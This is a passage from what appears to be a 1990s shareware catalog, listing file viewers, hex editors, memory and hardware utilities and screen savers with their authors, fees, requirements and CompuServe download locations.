+ Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + + Chapter 2, "Utilities" 48 + + + + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; EREPRT.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 76534,1166 + for assistance). + SWREG#: 6520 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Don't print your management reports! R-report reads all ASCII + print files and automatically creates permanent indexed + hierarchical outlines of the reports. Innovative Indexing-by- + Example method. View any section of the report instantly by + clicking on the outline. Search, split screens, export, file + compression, passwords. + + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + Product: EMERI + Reads your Windows Cardfiles from DOS! See full description on + page 230. + + Product: FCV + Author: Nounfield Ltd. (Andy Wilson) + Version: 1.1 (01-31-96) + Needs: IBM AT (80286), DOS 4.0 or better. 400k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 12 months of CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs; FCV110.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 1 (or contact userID 74012,1673 for + assistance). + PsL#: 14294 + Download size: 195k (about 15 minutes with a 2400 baud modem) + Description: + A file viewer able to handle files of any length, combined with + a DOS Shell able to process DOS commands, *.EXE and *.COM + files, capturing their console output in a scrollable display + in selectable text/hex format. Its filtering 6-term text/hex + search, when used together with captured DOS output, can + greatly enhance the scope of DOS commands. e.g. ... Search the + output of a 'TREE' or 'DIR /s' command for half-remembered + directory names, filenames etc. + + Chapter 2, "Utilities" 49 + + + + Product: Katelin Comment Manager + Author: Katelin, Inc., 217-662-6780 + Version: 1.20 (09-26-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse; Epson printer. + Registration fee: $22.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $11.25 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades; + registration commissions. 12-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: availability unknown on BBSs; COMMAN.EXE on CompuServe + in CIS:PCUTIL forum LIBrary 6 (or contact userID 76530,350 for + assistance). + Download size: 767k (about 57 minutes with a 2400 baud modem) + Description: + Lets the user attach narrative to your files in your own words. + Comments can be cut and pasted between files. Files can be + copied, moved, renamed, and duplicated while comments remain + intact. Seach for comments in files, search for files and text + in files. Launch your favorite programs without opening + Program Manager. View text and graphic (WMF, GIF, PCX, BMP, + ICO, TGA) files, also print/copy graphic files. Complete + directory maintenance functions. + + + Product: MultiVu + Author: Ivden Technologies, Inc., 610-328-1145 + Version: 2.0 (11-20-95) + Needs: IBM AT (80286), Windows 3.0 or better. CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; bonus utilities; all ASP- + wide offers (see page 6). 1 free update disk(s) sent out. + Look for: MULTVU.ZIP on BBSs (call 215-322-5114 to download it at + no charge); MULTVU.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 1 (or contact userID 71221,3602 for assistance). + SWREG#: 2993 + PsL#: 11408 + Download size: 126k (about ten minutes with a 2400 baud modem) + Description: + A Windows utility for viewing files up to 2 GB. Scans your disk + for text or files. Searches for text lightning fast. Keep up to + 20 files open. Drag'n'Drop support. File preload for smooth + scrolling. Background operation: load, search, print while + + Chapter 2, "Utilities" 50 + + + + browsing or using other programs. Maintain bookmarks in each + open file. Separately control screen and printer fonts. + Supports multiple concurrent users on a LAN. Multi-select + files, select text color, browse archive (zip files, etc.). + Works with Windows 95. + + + Product: PMFLCOMP + ASCII/hex/checksum file compare for OS/2. See full description + on page 42. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 234. + + Product: QRead + Author: DS Products (Daniel Scavezze) + Version: 2.0 (03-23-95) + Needs: IBM 80386, Windows 3.1 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + EGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $23.00 + Registration benefits: 31/2" master disk(s); lifetime CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: QREAD20.ZIP on BBSs; QREAD.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 70731,1673 for + assistance). + SWREG#: 5341 + PsL#: 11922 + Download size: 254k (about 19 minutes with a 2400 baud modem) + Description: + Lets you read text files quickly and easily in the Windows + environment. Automatically adjusts the font size or the line + structure to fit the window. Helps you keep track of your + files with reading lists. Lists store file descriptions of up + to 995 characters for easy access to information. Also + provides: reading timers, clipboard view, multi-file search, + and many other tools to make reading on the screen easier. + + Chapter 2, "Utilities" 51 + + + + Product: QRead for Windows 95 + Author: DS Products (Daniel Scavezze) + Version: 2.1 (05-25-96) + Needs: IBM 80386, Windows 95 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + VGA monitor. + Strongly recommended: Hard disk; Mouse; Epson printer. + Registration fee: $23.00 + Registration benefits: 31/2" master disk(s); lifetime CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: QREAD921.ZIP on BBSs; QREAD9.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 70731,1673 for + assistance). + SWREG#: 8022 + PsL#: 11922 + Download size: 375k (about 28 minutes with a 2400 baud modem) + Description: + Lets you read text files quickly and easily in the Windows + environment. Automatically adjusts the font size or the line + structure to fit the window. Helps you keep track of your + files with reading lists. Lists store file descriptions of up + to 995 characters for easy access to information. Also + provides: reading timers, clipboard view, multi-file search, + and many other tools to make reading on the screen easier. Now + has Win 95 user interace features and integral editor. + + + Product: SEE (File Viewer) + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 5.11 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 64k RAM. + Strongly recommended: Mouse. + Registration fee: 12.00US$ (add 2.00US$ for shipping to U.S. + addresses) (add 3.00US$ for shipping to Canadian addresses) + (add 5.00US$ for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: SEE511.ZIP on BBSs (call 216-661-9065 to download it at + no charge); SEE511.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73057,3113 for assistance); + SEE511.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Displays any size file with vertical and horizonal scroll bars + and full mouse support. You can freeze the top rows and left + columns as you scroll the rest of the text in any direction. + Can print files and can search for text strings and find + multiple occurances. + + Chapter 2, "Utilities" 52 + + + + Product: TC's Toolbox + Author: Specific Applications Software (Timothy W. Carlson), + 612-722-9659 + Version: 2.4 (09-22-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: VGA monitor; Modem. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of CompuServe, mail support; discounts on upgrades. + Look for: availability unknown on BBSs; TCT240.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 4 (or contact userID 76470,3424 for + assistance). + SWREG#: 4772 + PsL#: 11838 + Download size: 1073k (about 80 minutes with a 2400 baud modem) + Description: + Hex file viewer: view files in a hex & ANSI/ASCII format, + search & compare files, play sound files & more. File Workshop: + Copy/delete/wipe files, change date/time & more! Font viewer: + display entire font, lists fonts by family, show keyboard map. + System monitor: displays Windows resources. Calendar: monthly + calendar with events you provide. Phone Dialer, Text Editor, + Code Reference, Stopwatch, Save It! Contains too many features + to describe here. All come with help files. + + + Product: Technical Editor (DOS) + DOS virtual programmers editor. See full description on + page 179. + + Product: Technical Editor (OS/2) + 32-bit programmers editor for OS/2 2.x. See full description + on page 180. + + Product: TextPad 16 + TextPad 1.30: 16-Bit Text Editor. See full description on + page 181. + + Product: TextPad 32 + TextPad 1.30: 32-Bit Text Editor. See full description on + page 181. + + Chapter 2, "Utilities" 53 + + + + Product: VIEW_MAN + Author: MicroMetric (David Groome), 813-377-2515 + Version: 1.10 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. 200k RAM. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: VMAN110.ZIP on BBSs (call 813-371-2490 to download it + at no charge); VIEMAN.ZIP on CompuServe in CIS:IBM forum + LIBrary 0. + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Performs the functions of viewing, editing and/or printing a + selected file in both Hex and ASCII. File selection is by menu + choice rather that typing the path. Viewing and editing task + features include file positioning, search for string, search + and count, and search and replace. Program options may be + specified by command line/menu selection and saved as defaults; + a macro may be defined and run for repetative tasks. Printing + may be directed to any serial or parallel port or a disk file. + + + Product: VuGrafix Image Viewer + Graphic Image Viewer, Editor, Thumbnail. See full description + on page 480. + + Product: WDiff + Windows file/directory/ZIP difference viewer. See full + description on page 44. + + Product: Wilbur [***] + Author: RedTree Development Inc. + Version: 1.41 (07-06-96) + Needs: IBM 80386, Windows NT 3.1 or better. 8000k RAM. Win95 or + WinNT. + Registration fee: $29.95 + Registration benefits: 12 months of unlimited fax, mail support; + all ASP-wide offers (see page 6). 12-month free upgrading + allowed. Disables 30 day time limit. E-Mail support. + Look for: availability unknown on BBSs. + PsL#: 14619 + Download size: 1550k (about 115 minutes with a 2400 baud modem) + Description: + Wilbur 1.4 - Index, search and view files. Inspired by a lack + of a suitable Windows replacement for Lotus Magellan, Wilbur + was created to let you quickly search the contents of your + files. Fast indexing with small indexes. Supports wild cards, + logicals and indexing files inside Zip archives. Results are + shown in context. Fully featured 30 day time limited evaluation + copy. Win95 and WinNT only. See http://www.redtree.com. + + Chapter 2, "Utilities" 54 + + + + Product: Win Change + Author: JRE Enterprises + Version: 3.6 (09-30-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WCHG36.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WCHG36.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 1207 + Download size: 387k (about 29 minutes with a 2400 baud modem) + Description: + Provides the ability to globally change and/or find text in + GRP, INI, PIF and other file types. Multiple change/ find + criteria can be specified, works across multiple drives, + including network drives. Provides the capability to "back + out" changes that go awry. Files that have been found or + changed can be viewed, copied, moved, or deleted. + + + Product: XED + Author: David L. Dight, +61-2-3314521 + Version: 1.1b (08-24-94) + Needs: IBM AT (80286), DOS 3.1 or better. 384k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; EGA monitor. + Strongly recommended: VGA monitor; Dual 720k floppy drives; + Hard disk; Mouse. + Registration fee: $15.00 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $4.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: XED11B.ZIP on BBSs (call GARBO.UWASA.FI to download it + at no charge); XED11B.EXE on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 100033,2563 for assistance). + Download size: 172k (about 13 minutes with a 2400 baud modem) + Description: + A powerful yet simple to use hex/binary file editor. Provides + all the features you'd expect from a binary editor, including + modify file size: insert/delete from any file; text filters; + unassemble; C-like assignment expressions; create C data + definitions; binary display and edit modes; multiple file + markers; search & replace; import file; ASCII/hex/binary/oct/ + dec tables; full mouse support; 25/28/43/50 line modes. A fast + friendly and indispensable tool. + + Chapter 2, "Utilities" 55 + + + + 2.3 Hardware utilities + + Product: Depleter + Author: Cordes Development (Bernd J. Cordes), +49-40-494370 + Version: 2.2 (07-29-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; DEPLEE22.ZIP on + CompuServe in CIS:WINSHARE forum LIBrary 6 (or contact userID + 100334,375 for assistance). + SWREG#: 3147 + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + For owners of laptops and notebooks. Maintains and conditions + the battery for longer life. Countdown mode for controlling + remaining battery use time, based on previous measurements + during your normal work. Lets you see early when you will have + to shut down your work. Discharge mode for calculated battery + depletion. Lets you detect and cure the dreaded memory effect. + Graphic and list display. Works in background. + + + Product: ModemSta + Iconic status indicator for Windows. See full description on + page 376. + + Product: STEENBURGH's STUFF + 23 batch utilities, input, output, etc. See full description + on page 99. + + Product: SysChk + Author: Advanced Personal Systems (Paul Griffith), 408-298-3703 + Version: 2.38 (09-01-93) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Hard disk; Modem; Mouse; + Network (LAN); CD-ROM drive; EMS memory; XMS memory; math + coprocessor; sound card. + Registration fee: $20.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited fax, CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 497 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + System information checker provides complete details on devices + installed in your system. Shows CPU, bus type, BIOS info, + mouse info, I/O port info, all disk information, CD-ROM, + + Chapter 2, "Utilities" 56 + + + + network, video, memory info, TSRs, system speed, and lots more. + Print out a configuration report on your system. Includes + Pentium detection, I/O IRQs, and SCSI info. + + + 2.3.1 CPU & memory + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 102. + + Product: HiMOVE + Author: C.Sitte Softwaretechnik (Chris Sitte) + Version: 2.20 (05-12-93) + Needs: IBM PC, DOS 3.0 or better. 286 NEAT CHIPSet or NEATsx + CHIPSet or AT/386 CHIPSet or other upper memory hardware. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: HIMOV220.ZIP on BBSs; HIMOVE.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 73030,1070 for + assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + An upper memory manager for computers with a NEAT CHIPSet from + Chips & Technologies. Uses the shadow RAM capability of these + chipset to create a DOS5 compatible UMB (upper memory block) + area. It can also be used with any other type of UMB provider + software. Lets you load device drivers and resident programs + (TSRs) into unused areas of the upper memory area. Easy menu- + driven installation and configuration. No editing of + Autoexec.bat or Config.sys files is necessary. + + + Product: HiVIDEO + DOS memory expander for VGA/EGA systems. See full description + on page 59. + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Colorful system info Disk% MEMORY% 3-D pie. See full + description on page 110. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 103. + + Chapter 2, "Utilities" 57 + + + + Product: VMS40 - EMS emulator (disk) + Author: Fugue Software (David Noakes), +61-7-3824-2843 + Version: 1.2 (04-05-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; VMS240.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 100036,311 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + Device Driver - VMS40.SYS Emulates EMS memory on your hard disk + Registered version allows up to 32Meg Can load EMS page frame + into high memory Also LMS40 - converted High Memory on 286/386 + into EMS memory + + + 2.3.2 Keyboard + + Product: BATUTIL + Batch enhancement language. See full description on page 96. + + Product: STACKEY + Author: CTRLALT Associates + Version: 4.0 (12-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $49.00 + Registration benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 76004,1664 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Has the basic function of stacking keystrokes. It uses English + like F1 for the F1 key rather than cryptic hex codes. It + includes simulated pressing of lock keys, shifts, support for + Carousel, Desqview and hotkey/screen reading script control. PC + Magazine called it the 'ultimate batch enhancer' and PC World + and PC Computing included it in "Best of.." articles. Has a + keyboard recorder and more script control, including branching + on hotkeys and screen strings. + + Chapter 2, "Utilities" 58 + + + + 2.3.3 Screen + + Product: ATTRB + Author: Abri Technologies, Inc. + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM. + Registration fee: $5.00 (add $1.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + discounts on upgrades. + Look for: availability unknown on BBSs; ATTRB.EXE on CompuServe + in CIS:PCUTIL forum LIBrary 1 (or contact userID 72345,1623 for + assistance). + Download size: 21k (about two minutes with a 2400 baud modem) + Description: + Easy-to-use, intuitive, full screen, WYSIWYG, file attribute + changing utility to replace dos's ATTRIB. Changes attributes + for directory, file or all files at once. Wildcard selection + and directory changing within the program. + + + Product: A Batch View + Menus/msgs/info/utilities for DOS batch files. See full + description on page 95. + + Product: BLANK-IT + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 5.1b (10-11-92) + Needs: IBM PC, DOS 2.0 or better. 1k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $15.00 + Registration benefits: Full program functionality; 12 months of + unlimited phone, fax, BBS, CompuServe, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. + Look for: BLANK51B.ZIP on BBSs (call 401-767-3931 to download it + at no charge); BLANK5.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 59k (about five minutes with a 2400 baud modem) + Awards & nominations: 1990 winner, Public Brand Software + contests for useful programs. + Description: + Blacks out the computer display after a certain "time out" + period so that the computer screen won't become burned in. Burn + in is not uncommon and can destroy a monitor. Contains several + advanced features such as a quick blank "hot key" (Boss key"), + the ability to enable/disable itself while it's loaded, and + much more. Works with all monitors and is compatible with + Windows! Smaller and faster than the rest with more features + and excellent support! + + Chapter 2, "Utilities" 59 + + + + Product: BLANK-IT API Specifications + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 5.1b (10-29-92) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $0.00 + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; source code; all ASP-wide offers (see page 6); + discounts on other products. + Look for: APIBLANK.ZIP on BBSs (call 401-767-3931 to download it + at no charge); APIBLK.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + A package containing a program, source code, and an API + reference for use with the BLANK-IT screen saver program. + Utilizes the BLANK-IT API to blank the screen and/or unblank + the screen on demand. This program can be used in a DOS batch + file, an application's "script" file, from the WordPerfect + SHELL, and more! Includes full 'C' source code for programmers + to see how to use it! Includes the BLANK-IT API Reference. + + + Product: WINPAK #1 + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.2 (01-20-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $14.95 + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. + Look for: WINPAK1.ZIP on BBSs (call 401-767-3931 to download it + at no charge); WNPAK1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + A collection of high quality, entertaining screen saver modules + designed to be installed on a system running Windows 3.1. Our + modules are added to the list of screen savers that are + recognized by the Windows Control Panel/Desktop option for + choosing a screen saver. Consists of eight different screen + saver modules and a convenient, easy to use installation + utility. Experience our animation! + + + 2.3.3.1 EGA/VGA specific + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 488. + + Chapter 2, "Utilities" 60 + + + + Product: HiVIDEO + Author: C.Sitte Softwaretechnik (Chris Sitte) + Version: 2.03 (05-08-93) + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; site license; all ASP-wide offers (see page 6); + disks of other shareware. + Look for: HIVID203.ZIP on BBSs; HIVID.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 73030,1070 for + assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + Uses the unused graphics memory of the VGA/EGA display adapter + in text mode to expand the conventional DOS memory by 96kB. The + graphics modes are disabled if the conventional memory is + expanded in this way. The expansion can be switched on and off + dynamically from the command line. + + + Product: Palette Adjuster + Author: Lincoln Beach Software (Harold Holmes), 314-861-1500 + Version: 1.8 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; VGA + monitor. + Registration fee: $10.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + mail support; all ASP-wide offers (see page 6). + Look for: PAL18.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PAL18.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 70700,630 for assistance). + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Customize VGA palette to any color you like. Gives your screen + that truely customized look! + + Chapter 2, "Utilities" 61 + + + + Product: VPT + Author: clySmic Software + Version: 4.15 (12-29-91) + Needs: IBM AT (80286), DOS 3.1 or better. VGA monitor. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; VPT415.ZIP on CompuServe + in CIS:PCHW forum LIBrary 3 (or contact userID 76156,164 for + assistance). + Download size: 27k (about two minutes with a 2400 baud modem) + Description: + An interactive, easy to use color setting program for the VGA/ + MCGA. Allows use of all 262,144 VGA color shades in text mode. + Includes color files, command-line or interactive mode. Slick, + graphical-type display, no numbers to type. + + + 2.3.3.2 Screen savers + + If you see "bonus graphics" as a registration benefit for any + of these products, it usually means the author will scan the + color image of your choice for use in your screen saver. + Please contact the author of the product for more details. + + Product: Artillery Screen Saver + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 1.2 (11-11-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; SVGA + monitor; VBRUN300.DLL. 256-color Windows video driver. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; ARTYSS??.ZIP on + CompuServe in CIS:ASPCD forum LIBrary 0 (or contact userID + 72330,1776 for assistance). + SWREG#: 6290 + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + A Windows 3.1 screen saver module. Photos of artillery in + action - exciting! Photos rotate automatically when activated. + Plugs in to Control Panel Screen Saver section like any + standard screen saver module. Shots include self-propelled + howitzer, MLRS rocket launch, and 105mm howitzers slung beneath + a CH-47. + + Chapter 2, "Utilities" 62 + + + + Product: ARTSAVER Nature Screen Saver + Author: Scidel Technologies Inc. (Roger Bessette), 514-473-8119 + Version: 1.04 (05-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; SVGA + monitor; Mouse. + Registration fee: $14.95 + Registration benefits: lifetime unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: ARTSAVER.ZIP on BBSs; ARTSAVER.ZIP on CompuServe in + CIS:WINUTIL forum LIBrary 19 (or contact userID 102131,3251 for + assistance). + SWREG#: 11118 + Download size: 1043k (about 78 minutes with a 2400 baud modem) + Description: + High resolution screen saver. 30 high resolution superb + pictures showing nature in autumn. Pictures are in TrueColor + (16 million colors) with resolution up to 1024x768 in a + compress fractal format. Each picture is shown with many + transition and dissolved effects giving this screen saver a + unique artistic quality. Run in Windows 3.1 and 95, with 3 Mb. + of free hard disk space and SuperVGA monitor (256 colors) or + higher. + + + Product: Back Soon! + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 2.2 (03-21-95) + Needs: IBM PC, DOS 5.0 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: VGA monitor. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: BACKSN??.ZIP on BBSs; BACKSN??.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 1 (or contact userID 72330,1776 for + assistance). + SWREG#: 229 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Designed for the busy home or office environment and has the + following features: + * "Blanks" text screens to prevent phosphor burn-in + * Displays a customized, scrolling message + * Accepts messages from visitors + * Allows you to retrieve, print, or store your messages + * Optionally plays music/displays graphics between messages + * Built-in event scheduler + Turns your PC into a message center. Get rid of those notes + left on your desk. + + Chapter 2, "Utilities" 63 + + + + Product: Classic Phantoms Screen Saver + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 1.10 (11-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; SVGA + monitor; VBRUN300.DLL. 256-color Windows video driver. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: PHANTM??.ZIP on BBSs; PHANTM11.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 72330,1776 for + assistance). + SWREG#: 6291 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Windows screen saver featuring the F4 Phantom fighter jet. + Includes 3 high-resolution images; 7 more included with + registration. Images include fully armed interceptor flights + and bombing run. + + + Product: CUSTOM SCREEN SAVER (WINDOWS) + Author: Accidental Software, 619-247-2804 + Version: 1.0 (01-15-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse; VBRUN300.DLL. Vbrun300.Dll. + Strongly recommended: CD-ROM drive; sound card. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + all ASP-wide offers (see page 6); discounts on other products. + Look for: CUSTSAVR.ZIP on BBSs. + Download size: 1343k (about 100 minutes with a 2400 baud modem) + Description: + Build your very own custom screen saver with this program. + Registered users can add up to 100 of their own pictures to be + displayed as a screen saver. If you have a Midi, registered + users can add up to 100 midi music files to be played as their + screen saver displays their pictures. Those with a CD-ROM will + be able to listen to CD-AUDIO while the screen saver runs. + Image and Midi files may be individually added. Password + protection and message capability if desired. Images provided. + + Chapter 2, "Utilities" 64 + + + + Product: Doomsday Screen Saver + Author: 